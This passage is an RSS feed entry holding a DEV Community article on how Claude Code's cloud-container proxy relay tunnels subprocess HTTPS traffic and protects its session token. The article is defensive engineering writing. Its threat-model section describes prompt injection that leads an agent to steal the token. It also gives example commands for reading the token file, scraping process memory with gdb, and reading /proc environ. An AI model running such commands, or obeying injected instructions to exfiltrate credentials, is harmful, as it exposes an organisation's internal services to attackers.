<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>DEV Community: Laurent DeSegur</title>
    <description>The latest articles on DEV Community by Laurent DeSegur (@oldeucryptoboi).</description>
    <link>https://dev.to/oldeucryptoboi</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F3808673%2F54eff9e3-a1f0-4316-9d72-ef845fb3c591.jpg</url>
      <title>DEV Community: Laurent DeSegur</title>
      <link>https://dev.to/oldeucryptoboi</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://dev.to/feed/oldeucryptoboi"/>
    <language>en</language>
    <item>
      <title>The Upstream Proxy: How Claude Code Intercepts Subprocess HTTP Traffic</title>
      <dc:creator>Laurent DeSegur</dc:creator>
      <pubDate>Thu, 09 Apr 2026 01:18:40 +0000</pubDate>
      <link>https://dev.to/oldeucryptoboi/the-upstream-proxy-how-claude-code-intercepts-subprocess-http-traffic-1eeg</link>
      <guid>https://dev.to/oldeucryptoboi/the-upstream-proxy-how-claude-code-intercepts-subprocess-http-traffic-1eeg</guid>
      <description>&lt;p&gt;When Claude Code runs in a cloud container, every subprocess it spawns — &lt;code&gt;curl&lt;/code&gt;, &lt;code&gt;gh&lt;/code&gt;, &lt;code&gt;python&lt;/code&gt;, &lt;code&gt;kubectl&lt;/code&gt; — needs to reach external services. But the container sits behind an organization's security perimeter. The org needs to inject credentials (API keys, auth headers) into outbound HTTPS requests, log traffic for compliance, and block unauthorized endpoints. The subprocess doesn't know any of this. It just wants to &lt;code&gt;curl https://api.datadog.com&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;The naive solution: configure a corporate proxy and trust that every tool respects &lt;code&gt;HTTPS_PROXY&lt;/code&gt;. But that only works if the tool trusts the proxy's TLS certificate. A corporate proxy that inspects HTTPS traffic presents its own certificate — a man-in-the-middle certificate that &lt;code&gt;curl&lt;/code&gt; and &lt;code&gt;python&lt;/code&gt; will reject unless they trust the issuing CA. Every runtime has its own CA trust store: Node uses &lt;code&gt;NODE_EXTRA_CA_CERTS&lt;/code&gt;, Python uses &lt;code&gt;REQUESTS_CA_BUNDLE&lt;/code&gt; or &lt;code&gt;SSL_CERT_FILE&lt;/code&gt;, curl uses &lt;code&gt;CURL_CA_BUNDLE&lt;/code&gt;, Go uses the system store. Miss one and the subprocess fails with &lt;code&gt;CERTIFICATE_VERIFY_FAILED&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;And there's a deeper problem. The container's ingress is a GKE L7 load balancer with path-prefix routing. It doesn't support raw HTTP CONNECT tunnels — the standard way proxies handle HTTPS. You can't just point &lt;code&gt;HTTPS_PROXY&lt;/code&gt; at the ingress and expect CONNECT to work. The infrastructure needs a different transport.&lt;/p&gt;

&lt;p&gt;Claude Code solves this with an &lt;strong&gt;upstream proxy relay&lt;/strong&gt;: a local TCP server that accepts standard HTTP CONNECT requests from subprocesses, tunnels the bytes over WebSocket to the cloud gateway, and lets the gateway handle TLS interception and credential injection. The relay runs inside the container, bound to localhost, invisible to the agent. Subprocesses see a standard HTTPS proxy at &lt;code&gt;127.0.0.1:&amp;lt;port&amp;gt;&lt;/code&gt; and a CA bundle that trusts both the system CAs and the gateway's MITM certificate.&lt;/p&gt;

&lt;p&gt;This article traces every layer: the initialization sequence, the token lifecycle, the anti-ptrace defense, the CA certificate chain, the CONNECT-over-WebSocket protocol, the protobuf wire format, the NO_PROXY bypass list, and the subprocess environment injection that ties it all together.&lt;/p&gt;




&lt;h2&gt;
  
  
  When Does This Activate?
&lt;/h2&gt;

&lt;p&gt;The upstream proxy is a CCR (Cloud Code Runtime) feature. It only activates when four conditions are met:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight javascript"&gt;&lt;code&gt;&lt;span class="kd"&gt;function&lt;/span&gt; &lt;span class="nf"&gt;initUpstreamProxy&lt;/span&gt;&lt;span class="p"&gt;():&lt;/span&gt;
    &lt;span class="err"&gt;#&lt;/span&gt; &lt;span class="nx"&gt;Gate&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;Are&lt;/span&gt; &lt;span class="nx"&gt;we&lt;/span&gt; &lt;span class="k"&gt;in&lt;/span&gt; &lt;span class="nx"&gt;a&lt;/span&gt; &lt;span class="nx"&gt;cloud&lt;/span&gt; &lt;span class="nx"&gt;container&lt;/span&gt;&lt;span class="p"&gt;?&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="nx"&gt;not&lt;/span&gt; &lt;span class="nx"&gt;env&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;CLAUDE_CODE_REMOTE&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="nx"&gt;disabled&lt;/span&gt;

    &lt;span class="err"&gt;#&lt;/span&gt; &lt;span class="nx"&gt;Gate&lt;/span&gt; &lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;Has&lt;/span&gt; &lt;span class="nx"&gt;the&lt;/span&gt; &lt;span class="nx"&gt;server&lt;/span&gt; &lt;span class="nx"&gt;enabled&lt;/span&gt; &lt;span class="nx"&gt;the&lt;/span&gt; &lt;span class="nx"&gt;proxy&lt;/span&gt; &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="k"&gt;this&lt;/span&gt; &lt;span class="nx"&gt;session&lt;/span&gt;&lt;span class="p"&gt;?&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="nx"&gt;not&lt;/span&gt; &lt;span class="nx"&gt;env&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;CCR_UPSTREAM_PROXY_ENABLED&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="nx"&gt;disabled&lt;/span&gt;

    &lt;span class="err"&gt;#&lt;/span&gt; &lt;span class="nx"&gt;Gate&lt;/span&gt; &lt;span class="mi"&gt;3&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;Do&lt;/span&gt; &lt;span class="nx"&gt;we&lt;/span&gt; &lt;span class="nx"&gt;have&lt;/span&gt; &lt;span class="nx"&gt;a&lt;/span&gt; &lt;span class="nx"&gt;session&lt;/span&gt; &lt;span class="nx"&gt;ID&lt;/span&gt;&lt;span class="p"&gt;?&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="nx"&gt;not&lt;/span&gt; &lt;span class="nx"&gt;env&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;CLAUDE_CODE_REMOTE_SESSION_ID&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="nx"&gt;disabled&lt;/span&gt;

    &lt;span class="err"&gt;#&lt;/span&gt; &lt;span class="nx"&gt;Gate&lt;/span&gt; &lt;span class="mi"&gt;4&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;Is&lt;/span&gt; &lt;span class="nx"&gt;there&lt;/span&gt; &lt;span class="nx"&gt;a&lt;/span&gt; &lt;span class="nx"&gt;session&lt;/span&gt; &lt;span class="nx"&gt;token&lt;/span&gt; &lt;span class="nx"&gt;on&lt;/span&gt; &lt;span class="nx"&gt;disk&lt;/span&gt;&lt;span class="p"&gt;?&lt;/span&gt;
    &lt;span class="nx"&gt;token&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;readFile&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="s2"&gt;/run/ccr/session_token&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="nx"&gt;not&lt;/span&gt; &lt;span class="nx"&gt;token&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="nx"&gt;disabled&lt;/span&gt;

    &lt;span class="err"&gt;#&lt;/span&gt; &lt;span class="nx"&gt;All&lt;/span&gt; &lt;span class="nx"&gt;gates&lt;/span&gt; &lt;span class="nx"&gt;passed&lt;/span&gt; &lt;span class="err"&gt;—&lt;/span&gt; &lt;span class="nx"&gt;proceed&lt;/span&gt; &lt;span class="kd"&gt;with&lt;/span&gt; &lt;span class="nx"&gt;initialization&lt;/span&gt;
    &lt;span class="p"&gt;...&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The &lt;code&gt;CCR_UPSTREAM_PROXY_ENABLED&lt;/code&gt; flag is evaluated server-side, where the feature flag system has warm caches. The container gets a fresh environment with no cached flags, so a client-side check would always return the default (false). The server makes the decision and injects the result into the container's environment.&lt;/p&gt;

&lt;p&gt;Every subsequent step fails open: if anything goes wrong — CA download fails, relay can't bind, WebSocket connection breaks — the proxy is disabled and the session continues without it. A broken proxy setup must never break an otherwise-working session.&lt;/p&gt;
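&lt;p&gt;The fail-open discipline can be sketched in a few lines. This is an illustrative pattern, not the actual Claude Code internals; &lt;code&gt;init_with_fail_open&lt;/code&gt; and &lt;code&gt;flaky_ca_download&lt;/code&gt; are made-up names:&lt;/p&gt;

```python
# Sketch of the fail-open pattern: any error during proxy setup
# downgrades to "disabled" instead of crashing the session.
def init_with_fail_open(step):
    """Run a proxy-initialization step; on any failure, disable the proxy."""
    try:
        return step()
    except Exception:
        # A broken proxy must never break an otherwise-working session.
        return "disabled"

def flaky_ca_download():
    raise TimeoutError("CA endpoint hung")

status = init_with_fail_open(flaky_ca_download)
```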




&lt;h2&gt;
  
  
  The Token Lifecycle
&lt;/h2&gt;

&lt;p&gt;The session token authenticates the relay to the cloud gateway. Its lifecycle is designed around a single threat: &lt;strong&gt;prompt injection leading to token exfiltration&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;The attack scenario: Claude Code runs user-provided code. A malicious prompt tricks the model into executing a shell command that reads the token and sends it to an attacker-controlled server. With the token, the attacker can impersonate the session and access the organization's internal services through the proxy.&lt;/p&gt;

&lt;p&gt;The defense is a four-step sequence:&lt;/p&gt;

&lt;h3&gt;
  
  
  Step 1: Read the Token
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight javascript"&gt;&lt;code&gt;&lt;span class="nx"&gt;token&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;readFile&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="s2"&gt;/run/ccr/session_token&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The CCR orchestrator writes the token to a tmpfs mount at container startup. It's readable by the process user and exists only in memory-backed storage — never on a persistent disk.&lt;/p&gt;

&lt;h3&gt;
  
  
  Step 2: Block ptrace
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight javascript"&gt;&lt;code&gt;&lt;span class="kd"&gt;function&lt;/span&gt; &lt;span class="nf"&gt;setNonDumpable&lt;/span&gt;&lt;span class="p"&gt;():&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="nx"&gt;platform&lt;/span&gt; &lt;span class="nx"&gt;is&lt;/span&gt; &lt;span class="nx"&gt;not&lt;/span&gt; &lt;span class="nx"&gt;linux&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt;  &lt;span class="err"&gt;#&lt;/span&gt; &lt;span class="nx"&gt;only&lt;/span&gt; &lt;span class="nx"&gt;Linux&lt;/span&gt; &lt;span class="nx"&gt;has&lt;/span&gt; &lt;span class="nx"&gt;prctl&lt;/span&gt;

    &lt;span class="nx"&gt;lib&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;dlopen&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="s2"&gt;libc.so.6&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="nx"&gt;PR_SET_DUMPABLE&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;4&lt;/span&gt;
    &lt;span class="nx"&gt;lib&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;prctl&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;PR_SET_DUMPABLE&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This is the critical security step. &lt;code&gt;prctl(PR_SET_DUMPABLE, 0)&lt;/code&gt; tells the Linux kernel that this process cannot be attached to via ptrace by other processes running under the same UID; only a process holding &lt;code&gt;CAP_SYS_PTRACE&lt;/code&gt; can still trace it. Without this, a prompt-injected command like &lt;code&gt;gdb -p $PPID -batch -ex 'find ...'&lt;/code&gt; could attach to the Claude Code process, scan its heap, and extract the token from memory.&lt;/p&gt;

&lt;p&gt;The call uses Bun's FFI (Foreign Function Interface) to directly invoke &lt;code&gt;prctl&lt;/code&gt; from libc. It runs on Linux only; on other platforms it silently no-ops. If the FFI call itself fails (wrong libc path, missing symbol), it logs a warning and continues — fail-open, because blocking the entire session over a defense-in-depth measure would be wrong.&lt;/p&gt;
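&lt;p&gt;For readers who want to experiment with the same defense, here is a minimal sketch using Python's &lt;code&gt;ctypes&lt;/code&gt; in place of Bun's FFI. The constant &lt;code&gt;PR_SET_DUMPABLE = 4&lt;/code&gt; comes from &lt;code&gt;linux/prctl.h&lt;/code&gt;; the function name is illustrative:&lt;/p&gt;

```python
import ctypes
import sys

PR_SET_DUMPABLE = 4  # from linux/prctl.h

def set_non_dumpable():
    """Mark the process non-dumpable so same-UID processes cannot ptrace it."""
    if not sys.platform.startswith("linux"):
        return False  # prctl is Linux-only; silently no-op elsewhere
    try:
        libc = ctypes.CDLL("libc.so.6", use_errno=True)
        # prctl(PR_SET_DUMPABLE, 0, 0, 0, 0) returns 0 on success
        return libc.prctl(PR_SET_DUMPABLE, 0, 0, 0, 0) == 0
    except OSError:
        return False  # fail-open: log and continue in the real system
```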

&lt;h3&gt;
  
  
  Step 3: Start the Relay
&lt;/h3&gt;

&lt;p&gt;The relay binds to localhost and begins accepting CONNECT requests. Only after the relay is confirmed listening does step 4 proceed.&lt;/p&gt;

&lt;h3&gt;
  
  
  Step 4: Unlink the Token File
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight javascript"&gt;&lt;code&gt;&lt;span class="k"&gt;await&lt;/span&gt; &lt;span class="nf"&gt;unlink&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="s2"&gt;/run/ccr/session_token&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="err"&gt;#&lt;/span&gt; &lt;span class="nx"&gt;Token&lt;/span&gt; &lt;span class="nx"&gt;is&lt;/span&gt; &lt;span class="nx"&gt;now&lt;/span&gt; &lt;span class="nx"&gt;heap&lt;/span&gt;&lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="nx"&gt;only&lt;/span&gt; &lt;span class="err"&gt;—&lt;/span&gt; &lt;span class="nx"&gt;file&lt;/span&gt; &lt;span class="nx"&gt;is&lt;/span&gt; &lt;span class="nx"&gt;gone&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The token file is deleted from disk. The token now exists only in the process's heap memory, protected by &lt;code&gt;PR_SET_DUMPABLE&lt;/code&gt;. A subprocess can't &lt;code&gt;cat /run/ccr/session_token&lt;/code&gt; because the file no longer exists. It can't &lt;code&gt;gdb -p $PPID&lt;/code&gt; because ptrace is blocked.&lt;/p&gt;

&lt;p&gt;The ordering is deliberate: unlink happens AFTER the relay is confirmed up. If the CA download or relay startup fails, the token file remains on disk so a supervisor restart can retry the full initialization. Once the relay is running, the file is expendable.&lt;/p&gt;
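&lt;p&gt;The ordering can be demonstrated with a self-contained sketch, substituting a temp file for &lt;code&gt;/run/ccr/session_token&lt;/code&gt; and a stub for the relay (all names here are illustrative):&lt;/p&gt;

```python
import os
import tempfile

def init_relay(token_path, start_relay):
    # Step 1: read the token into process memory
    with open(token_path) as f:
        token = f.read()
    # Step 3: start the relay; if this raises, the token file survives
    # on disk so a supervisor restart can retry the full sequence
    start_relay(token)
    # Step 4: only after the relay is confirmed up, delete the file;
    # the token now exists solely on this process's heap
    os.unlink(token_path)
    return token

tmp = tempfile.NamedTemporaryFile(mode="w", delete=False, suffix=".token")
tmp.write("secret-session-token")
tmp.close()
token = init_relay(tmp.name, lambda t: None)  # relay startup stubbed out
```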

&lt;p&gt;Why not just use environment variables? Because environment variables are readable by any subprocess via &lt;code&gt;/proc/$PPID/environ&lt;/code&gt;. The token would be trivially exfiltrable. The heap-only approach requires ptrace, which &lt;code&gt;PR_SET_DUMPABLE&lt;/code&gt; blocks.&lt;/p&gt;




&lt;h2&gt;
  
  
  The CA Certificate Chain
&lt;/h2&gt;

&lt;p&gt;The cloud gateway terminates TLS on behalf of the real upstream server and presents its own certificate. Subprocesses need to trust this certificate. The system downloads the gateway's CA certificate and creates a merged bundle:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight javascript"&gt;&lt;code&gt;&lt;span class="kd"&gt;function&lt;/span&gt; &lt;span class="nf"&gt;downloadCaBundle&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;baseUrl&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;systemCaPath&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;outPath&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
    &lt;span class="err"&gt;#&lt;/span&gt; &lt;span class="nx"&gt;Download&lt;/span&gt; &lt;span class="nx"&gt;the&lt;/span&gt; &lt;span class="nx"&gt;gateway&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;s CA cert from the Anthropic API
    response = fetch(baseUrl + "/v1/code/upstreamproxy/ca-cert",
                     timeout: 5000)
    if response not ok:
        return false  # fail-open: proxy disabled

    gatewayCa = response.text()

    # Read the system&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="nx"&gt;s&lt;/span&gt; &lt;span class="nx"&gt;existing&lt;/span&gt; &lt;span class="nx"&gt;CA&lt;/span&gt; &lt;span class="nx"&gt;bundle&lt;/span&gt;
    &lt;span class="nx"&gt;systemCa&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;readFile&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="s2"&gt;/etc/ssl/certs/ca-certificates.crt&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

    &lt;span class="err"&gt;#&lt;/span&gt; &lt;span class="nx"&gt;Concatenate&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;system&lt;/span&gt; &lt;span class="nx"&gt;CAs&lt;/span&gt; &lt;span class="nx"&gt;first&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;gateway&lt;/span&gt; &lt;span class="nx"&gt;CA&lt;/span&gt; &lt;span class="nx"&gt;appended&lt;/span&gt;
    &lt;span class="nf"&gt;mkdir&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nf"&gt;dirname&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;outPath&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;
    &lt;span class="nf"&gt;writeFile&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;outPath&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;systemCa&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="nx"&gt;gatewayCa&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="err"&gt;#&lt;/span&gt; &lt;span class="nx"&gt;outPath&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="o"&gt;~&lt;/span&gt;&lt;span class="sr"&gt;/.ccr/&lt;/span&gt;&lt;span class="nx"&gt;ca&lt;/span&gt;&lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="nx"&gt;bundle&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;crt&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The merged bundle goes to &lt;code&gt;~/.ccr/ca-bundle.crt&lt;/code&gt;. Subprocesses get this path via four environment variables, covering every major runtime's CA discovery mechanism:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Variable&lt;/th&gt;
&lt;th&gt;Runtime&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;SSL_CERT_FILE&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;curl, OpenSSL-based tools&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;NODE_EXTRA_CA_CERTS&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Node.js&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;REQUESTS_CA_BUNDLE&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Python requests/httpx&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;CURL_CA_BUNDLE&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;curl (alternative)&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;The 5-second fetch timeout is deliberate. Bun has no default fetch timeout — without one, a hung CA endpoint would block CLI startup forever. 5 seconds is generous for a small PEM file.&lt;/p&gt;
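&lt;p&gt;A minimal sketch of the merge and the four-variable injection, with inline placeholder certificates instead of a real download (names are illustrative, not the actual implementation):&lt;/p&gt;

```python
def build_ca_bundle(system_ca, gateway_ca):
    # System CAs first, gateway MITM CA appended, matching the ordering above
    return system_ca.rstrip("\n") + "\n" + gateway_ca

def ca_env(bundle_path):
    # One variable per runtime's CA discovery mechanism
    return {
        "SSL_CERT_FILE": bundle_path,        # curl, OpenSSL-based tools
        "NODE_EXTRA_CA_CERTS": bundle_path,  # Node.js
        "REQUESTS_CA_BUNDLE": bundle_path,   # Python requests/httpx
        "CURL_CA_BUNDLE": bundle_path,       # curl (alternative)
    }

bundle = build_ca_bundle("-----SYSTEM CA-----\n", "-----GATEWAY CA-----\n")
env = ca_env("/home/user/.ccr/ca-bundle.crt")
```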




&lt;h2&gt;
  
  
  The CONNECT-over-WebSocket Relay
&lt;/h2&gt;

&lt;p&gt;The relay is the core of the system. It translates standard HTTP CONNECT requests into WebSocket tunnels that the cloud gateway can route.&lt;/p&gt;

&lt;h3&gt;
  
  
  Why WebSocket?
&lt;/h3&gt;

&lt;p&gt;The CCR ingress is a GKE L7 load balancer with path-prefix routing. L7 load balancers inspect HTTP requests and route based on URL paths. HTTP CONNECT is a different protocol — it asks the proxy to establish a raw TCP tunnel, which L7 load balancers typically can't route. There's no &lt;code&gt;connect_matcher&lt;/code&gt; in the CDK constructs.&lt;/p&gt;

&lt;p&gt;WebSocket, however, is an HTTP upgrade — it starts as a normal HTTP request (routable by L7) and then upgrades to a bidirectional binary channel. The session ingress tunnel already uses this pattern. The upstream proxy follows suit.&lt;/p&gt;

&lt;h3&gt;
  
  
  The Protocol
&lt;/h3&gt;

&lt;p&gt;The relay listens on &lt;code&gt;127.0.0.1:0&lt;/code&gt; (ephemeral port) and handles each connection through a two-phase state machine:&lt;/p&gt;
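&lt;p&gt;The ephemeral-port trick is standard sockets behavior: bind to port 0 and ask the kernel which port it picked. A quick Python illustration (not the relay's actual code):&lt;/p&gt;

```python
import socket

srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
srv.bind(("127.0.0.1", 0))      # port 0 means "pick any free port"
srv.listen(8)
host, port = srv.getsockname()  # the kernel-assigned ephemeral port
srv.close()
```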

&lt;p&gt;&lt;strong&gt;Phase 1: CONNECT Accumulation&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight javascript"&gt;&lt;code&gt;&lt;span class="kd"&gt;function&lt;/span&gt; &lt;span class="nf"&gt;handleData&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;socket&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;state&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;data&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="nx"&gt;no&lt;/span&gt; &lt;span class="nx"&gt;WebSocket&lt;/span&gt; &lt;span class="nx"&gt;exists&lt;/span&gt; &lt;span class="nx"&gt;yet&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="err"&gt;#&lt;/span&gt; &lt;span class="nx"&gt;Accumulate&lt;/span&gt; &lt;span class="nx"&gt;bytes&lt;/span&gt; &lt;span class="nx"&gt;until&lt;/span&gt; &lt;span class="nx"&gt;we&lt;/span&gt; &lt;span class="nx"&gt;see&lt;/span&gt; &lt;span class="nx"&gt;the&lt;/span&gt; &lt;span class="nx"&gt;full&lt;/span&gt; &lt;span class="nx"&gt;CONNECT&lt;/span&gt; &lt;span class="nx"&gt;header&lt;/span&gt;
        &lt;span class="nx"&gt;state&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;connectBuf&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;concat&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;state&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;connectBuf&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;data&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

        &lt;span class="nx"&gt;headerEnd&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;indexOf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;state&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;connectBuf&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\r\n\r\n&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="nx"&gt;headerEnd&lt;/span&gt; &lt;span class="nx"&gt;is&lt;/span&gt; &lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
